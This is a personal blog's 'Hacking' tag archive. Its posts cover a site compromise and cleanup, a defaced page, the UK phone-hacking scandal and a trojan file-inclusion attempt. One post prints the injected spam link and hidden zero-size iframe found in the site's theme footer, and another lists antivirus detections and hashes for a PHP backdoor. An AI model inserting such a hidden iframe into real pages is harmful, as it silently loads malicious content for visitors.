Tag Archive: Hacking

Hacked – I was a possible Malware Site for tructuyenso.vn!

Introduction

A few days ago I got hacked.  I quickly ripped out a heap of dodgy files left by the hackers but for some days now, Firefox, my browser, while viewing pages on this website, has been saying that it’s “downloading data from tructuyenso.vn… “.

.htaccess

This, of course, was not actually happening, as I’ve put the blockers on the whole of Vietnam using .htaccess!  The reason for this is that initially, tructuyenso wasn’t the only site appearing in the progress tip – there was another which lasted until I got rid of the various files dumped on my website.  This is how:

<Limit GET POST>
order allow,deny
deny from 112.0.0.0/8
allow from all
</Limit>

However, the call was still being made from somewhere on my site as the progress indicator wouldn’t stop….

Site5 Search

A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager.  (In the end, this was my failing and I will not rely on the thing again!)

A search through my database also turned up zero.

TCPView

TCPView is a download from Sysinternals.com  (now Microsoft!) that shows the various net connections being made to one’s PC from everywhere.  This immediately showed that as soon as the main strangelyperfect.tv website (not the backend WordPress admin area), fired up in Firefox, as many as 7 connections were simultaneously made to 112.78.15.230……  This is the IP address that holds tructuyenso.vn, plus 11 other domains, some of which I’d seen flash through the progress bar.

Even when closed by TCPView, the connections would immediately start up again to the same IP address, 112.78.15.230  (manually closing strangelyperfect.tv stopped the connections).

Reverse IP on tructuyenso.vn

Reverse IP on tructuyenso.vn

YouGetSignal.com shows the domains up nicely in the screenshot above..

Result!

Finding nowt anywhere and Google searches providing zilch on the website in question except in Vietnamese, I turned to the WordPress Codex, specifically, https://codex.wordpress.org/FAQ_My_site_was_hacked

I had of course previously changed my FTP, mySQL databaase and site management passwords, but the link at the bottom to a Website malware & blacklist scan (Sucuri) was the killer!  On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free! (Of course, I wasn’t hosting malware – just that it gave an indication that I was and hence the slowness of the site to load as it tried and failed to download shite my way from Vietnam)

This is their take on it: http://sucuri.net/malware/malware-entry-mwiframehd202

Final Cause and Clean Up

Checking the source code for my homepage (which in retrospect I should have done first!!) threw up “tructuyenso.vn” right at the very bottom.  This is the code as it was when I checked:

<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>

This was then easily traced to the footer.php file in my theme, Suffusion.

It was simply stripped out and the website then worked fine…..  but to be sure, I have downloaded then checked the footer file in a fresh theme download to be sure – it’s clean!  I then uploaded a whole clean Suffusion theme in it’s entirety just in case any other theme files were compromised during the original hack yet were dormant, waiting for a trigger.

A recheck on Securi shows my website to be okay now.  See screendump below.   I’ll be using Securi  a lot more!

Securi Site Check

Securi Site Check

Related Posts:

Comments are closed

Jesse Willms Hacked

Jesse Willms Ethics Hacked

Jesse Willms Ethics About Page Hacked

Jesse Willms Ethics About Page Hacked

I got a auto-alert from a Scamraiders post from Justin Asking that a page on one of the plethora of Willms self-promotional websites has been tampered with – and sure enough it has!  See here for the original comment from Justin Asking.

Below is a screenshot of the hacked page, a brief perusal of the rest of the site shows no other tamperings….  Still.  It made me laugh, although having had this website and the Crawling Chaos website hacked by Turks, I know that personally, it’s not a lot of fun.  (I wonder if Willms will post about it and how long it’ll take to fix it…Probably got a lot on his plate, currently!)

Jesse Willms Ethics About Page Hacked

Jesse Willms Ethics About Page Hacked

Related Posts About My Hacking Experience

Related Posts:

Terror State Chickens Return to Phone Hacking Roost

Introduction

Greenpeace Action

Greenpeace Action

Many years ago when I was living in France and during a prolonged period of French atomic weapon testing on the Moruroa atoll, the Greenpeace ship, Rainbow Warrior, was blown up in a New Zealand harbour. Initially, it was thought to be an accident.

Now, as soon as this happened, I thought “who has most to gain from the sinking of this protest ship?”

I immediately said, “The French” to my partner.  It’s in their interest to get that pesky ship put of their test zone.

Many years passed until finally some French Secret Service agents were collared for the dastardly deed.   President Mitterand, it turns out, authorised the bombing and thus the death of the Portuguese Dutch photographer, Fernando Pereira.

Phone Hacking

  1. The news this week is that the sleaze-paper, News of the World (NOTW), part of the nationality-challenged Rupert Murdoch’s empire, hacked many prominent people’s phones in order to gather information.  (News of the World ‘bugging’ claim – Wednesday 8th)

    E60

    Phone Hacking

  2. Later, the news was that there was going to be a huge investigation by the police into the allegations. (Police to probe phone hack claims – Thursday 9th).  In fact, PM Brown said, “This raises questions that are serious and will obviously have to be answered.”
  3. A few hours later, and the massive investigation was finished!  (New phone hack inquiry ruled out – Thursday 8th)  Second top Met Cop John Yates said, “No additional evidence has come to light since this case has concluded. I therefore consider that no further investigation is required.”  He also said, “This investigation has not uncovered any evidence to suggest that John Prescott’s phone had been tapped.”

Astonishing Speed

Warning: sarcasm alert! I think it’s amazing that Yates & Co. has managed to sift through all of this evidence in less than half a day!  It’s fantastic!  If only all enquiries were this fast!  Arms to Iraq!  Iraq War!  Cash for Questions!  G20 Tomkinson Death and Kettling tactics!  You know, things would be so much better.

Who Has Most to Gain?

Rupert Murdoch - will he gain?

Rupert Murdoch - will he gain?

Going back to my Rainbow Warrior experience, this is the thought that now crosses my mind.  In situations like this, forget the morals and any issues of integrity, personal or national, that arise.  Just look at the question in it’s starkness.  Who has most to gain?

Well this question really has several parts, or vantage points, if you like, that all supply an answer to the above question.

  • Obviously, The Guardian now gains from extra publicity, their oxygen of business.
  • NOTW originally gained by getting stories, the same oxygen of their business.
  • Robert Preston here (News of the World bugged Sun editor), reveals that all papers were (and still are?) using such tricks.  It’s all their oxygen.

Police Gain.

A key sentence in Robert Preston’s piece (News of the World bugged Sun editor) is near the bottom.  See if you can find it!

This is the relevant chunk, showing the information source as Richard Thomas, recently retired Information Commissioner and quoted verbatim from Preston’s blog.  Thomas did a huge investigation into phone hacking which were presented before our Parliament, our representatives, in 2007.  This is the chunk below (remember, see if you can see the key bit!!):

Richard Thomas, 'a champion of civil liberties'. Photo: Michael Stephens/ PA

Richard Thomas, 'a champion of civil liberties'. Photo: Michael Stephens/ PA

A good deal of this trade in personal confidential information has already been exposed by Richard Thomas, who has just retired as information commissioner.

In a series of reports and in evidence to the House of Commons culture, media and sport committee, he made a series of disclosures about newspaper activities that he regarded as “prima facie” illegal.

Here’s a statement from him to MPs that he gave in March 2007, which refers to the results of an investigation he carried out into the business relationship between the press and a firm of private investigators (the investigation was given the codename Operation Motorman):

“The first thing I would need to share is that the 3,000 or 4,000 transactions identified… came from a total of 13,000 transactions in this one operation alone. We were careful only to put forward those where there was some sort of hard evidence of the transaction being positively identified as involving a journalist for a newspaper”.

And this is what he cited as the evidence of payments being made by journalists for the information:

“We did have, and we do have still, the statements, the bank statements, the invoices – some of these well-known proprietors were including information such as ‘payment for confidential information’, payment for ‘blagging’ [obtaining information by deception] in some cases – so there was what I might call hard ‘prima facie’ evidence.”

soclose

Law Enforcement

However the degree of detail obtained by him about this trade was startling.

Where did the money end up? Well, a flow-chart produced by the office of the information commissioner shows the press employing private detectives who in turn deal with phone companies, call centres, the DVLA and what’s described as “police source”.

Did you spot the last bit of the sentence?  I’ll paraphrase now for emphasis…

Where did the money (paid for hacked information) end up? The information commissioner shows the press employing private detectives who deal with (…) a “police source“.

And there we have it!

Conclusion

Now we know why Yates’ “investigation” finished so quickly.  The former information commisioner tells us in words presented to parliament – to protect the police!

Just remember, this current government has ramped up the “fear factor” over terrorism so much, that the police and other services have unparalled access to all sorts of electronic information.  In fact, by law, telecoms companies are required to keep it….

In this week’s events we’ve seen the Police investigate an event of which they were one of the prime information sources (according to Thomas) and declared “no case to answer”.  They are investigator, judge, jury and imprisoner.

As I’ve predicted many times in these pages, (and I’m only using history as a guide here, remember – I’m not a fortune teller), when the police are given unbridled power, that power will be abused either by an individual or the organisation as a whole.

The police now have power of arrest for virtually anything – e.g. by law, I’m not allowed to take their photo!  I can be arrested and searched without reason and imprisoned for the same reasons indefinitely.  Just look.  It’s all there, all passed in the last few years.

But if this case and previous ones are anything to go by, it appears that if an “investigator” can’t get the information they want, they pay the police for it!

What have we got here – the Rockford Files!

And afterwards, the Police say “no case”.  “Case closed”. “No further information”.

Our chickens have come home to roost, and no-one’s noticing!

PostScript

Actually, someone’s noticing.

 Director of Public Prosecutions Keir Starmer launches 'urgent' review of phone tap inquiry  Photo: PA

Director of Public Prosecutions Keir Starmer launches 'urgent' review of phone tap inquiry Photo: PA

The police have decided to do nothing because, as they say no NEW information is about  (this is now being mis-quoted as in “There is no information that John Prescott’s phone was tapped” instead of “There is no NEW information that John Prescott’s phone was tapped” – which is a different thing altogether and those saying it, know it!)

  • However, it’s now emerging that many “stars” and “personalities” are planning to sue the NOTW and other papers.  See Stars ‘may sue’ over phone claims
  • Also, the DPP has launched an inquiry.
  • The PCC likewise.
  • Parliament too.
  • And calls for the police to do the right thing and investigate properly are mounting.

I watch with anticipation from my little tank.  I’ve a feeling, and I hope, that this one will run and run and that hopefully, some proper rein will be put on our law enforcement folk.  Unlike most people, I don’t consider this a press freedom issue – I consider it a key part of all our freedoms.

See these links:

Related Posts:

Comments are closed

Hacking Attempt Today via FoxReality

Multiple Attempts to Drop Trojan on This Website Failed

These are the Wassup details of the attack

69.65.41.165 2009-06-13 10:48:00

  • User Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
  • OS: WinVista
  • BROWSER: IE 7

As you can see SERVER[DOCUMENT ROOT]= is a part of php code and they’ve attempted to change my domain root to that of http://web.archive.org/web/20130611185214/http://www.foxreality.com/ which is part of Rupert Murdoch’s empire.

NOD32 NAC Trojan

NOD32 NAC Trojan

The hyperlinks above don’t work as the code failed. However, if you are brave, strip out the first bit and just go to as I did, and hopefully, your anti-virus or browser will kick in with a malware warning like mine did!   The malware is identified as a Trojan by my NOD32 anti-virus software as;  PHP/Small.NAC trojan

Conclusion

Someone has dumped a piece of malware on the Fox network and is now going round blogs and other websites to get them to point to the trojan and thus spread the nefarious package. It just needs one click!

As I type this, at 2009-06-13 10:51:43 I had two more attacks!!! That’s nine in the last few minutes.
Checking the web for references, I’ve found this Russian webpage where the trojan has been tested against various antivirus programs – about half don’t detect it and it’s from the end of May this year! See link, translated into English.

This is their test:

Файл test.txt получен 2009.05.27 20:52:02 (UTC)
Текущий статус: закончено Current status: finished
Результат: 16/40 (40%) Result: 16/40 (40%)
Цитата: Quote:
Антивирус.ерсия Обновление Результат Antivirus Version Update Result
a-squared 4.0.0.101 2009.05.27 Backdoor.PHP.Small.o!IK
AhnLab-V3 5.0.0.2 2009.05.27 HTML/Xema
AntiVir 7.9.0.168 2009.05.27 BDS/PHP.ali.1
Antiy-AVL 2.0.3.1 2009.05.27 –
Authentium 5.1.2.4 2009.05.27 –
Avast 4.8.1335.0 2009.05.27 –
AVG 8.5.0.339 2009.05.27 BackDoor.Generic_c.BTI
BitDefender 7.2 2009.05.27 Backdoor.PHP.ALI
CAT-QuickHeal 10.00 2009.05.27 –
ClamAV 0.94.1 2009.05.27 PHP.Shell-23
Comodo 1207 2009.05.27 Unclassified Malware
DrWeb 5.0.0.12182 2009.05.27 –
eSafe 7.0.17.0 2009.05.27 –
eTrust-Vet 31.6.6524 2009.05.27 –
F-Prot 4.4.4.56 2009.05.27 –
F-Secure 8.0.14470.0 2009.05.27 Exploit:PHP/Preamble.A
Fortinet 3.117.0.0 2009.05.27 –
GData 19 2009.05.27 Backdoor.PHP.ALI
Ikarus T3.1.1.57.0 2009.05.27 –
K7AntiVirus 7.10.746 2009.05.27 –
Kaspersky 7.0.0.125 2009.05.27 –
McAfee 5628 2009.05.27 –
McAfee+Artemis 5628 2009.05.27 –
McAfee-GW-Edition 6.7.6 2009.05.27 Trojan.Backdoor.PHP.ali.1
Microsoft 1.4701 2009.05.27 –
NOD32 4109 2009.05.27 PHP/Small.NAC
Norman 6.01.05 2009.05.27 –
nProtect 2009.1.8.0 2009.05.27 Backdoor.PHP.ALI
Panda 10.0.0.14 2009.05.27 –
PCTools 4.4.2.0 2009.05.21 PHP.ShellBot.M
Prevx 3.0 2009.05.27 –
Rising 21.31.21.00 2009.05.27 –
Sophos 4.42.0 2009.05.27 Troj/PHPBdoor-A
Sunbelt 3.2.1858.2 2009.05.27 –
Symantec 1.4.4.12 2009.05.27 –
TheHacker 6.3.4.3.332 2009.05.26 –
TrendMicro 8.950.0.1092 2009.05.27 –
VBA32 3.12.10.6 2009.05.27 Backdoor.PHP.Small.o
ViRobot 2009.5.27.1757 2009.05.27 –
VirusBuster 4.6.5.0 2009.05.27 PHP.ShellBot.M
Дополнительная информация Additional Information
File size: 1165 bytes
MD5…: f1a9b4e4b207cd38641061e1b72d4775
SHA1..: 33c02179e53c19e00897fb0c63501acc0a2233e8
SHA256: 0b3eef46d7111939962db133d2e75530fbb7946d92a33195ca 6b7f2e1affe43a
ssdeep: 24:kwauoGPmXvuH6dcFTGPmXvuH6dc4H6dcZ1Mpn6+YvKsLKPX VwuHENNTh:bBoC
gMQsCgMQfQu1M5XW0SNl
PEiD..: – PEiD ..: —
TrID..: File type identification TrID ..: File type identification
HyperText Markup Language (100.0%) HyperText Markup Language (100.0%)
PEInfo: – PEInfo: —
PDFiD.: – PDFiD.: —
RDS…: NSRL Reference Data Set RDS …: NSRL Reference Data Set

Needless to say I’ve blocked the source IP address now.  It was from GigeNET in Illinois, and they’ve been told!

Related Posts:

DB Cache Replaces WP Super Cache

Strangely post on March 18th, 2009
Posted in Technology Tags: , , , , , , , , , , , , , , , , , , , , , , , ,

Following on from my previous little post about DB Cache, I’ve been using it since that time and it seems to be faster to me from little old Blighty.  I use a USA based host so anything I see has to cross the pond anyway, but in a non-logged-in state, page loading is definitely faster than it was.  WP Super Cache is now consigned to the test bed of history.  Long live DB Cache, ha, ha.

Seriously, DB Cache is faster than no caching and Super Cache from my viewpoint, and in the end, that’s what counts.  And BTW, my permalinks work fine now, Hurrah!

Paradoxically, since this time, my host has had quite a few drop-outs and the web access has been lost intermittently.  One time was due to the database server falling over but the rest have been web server issues as far as I can tell.  The mail server has worked okay even when the web server has been off, as has the customer service system server!  I can’t see how the DB Cache plugin is doing this – it’s just co-incidence, I’m 99% sure.  Anyway, I’ve politely told iXWebhosting that their chances are running out and they’ve been very apologetic etc etc.

Watch this space!

Links:

Related Posts:

© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me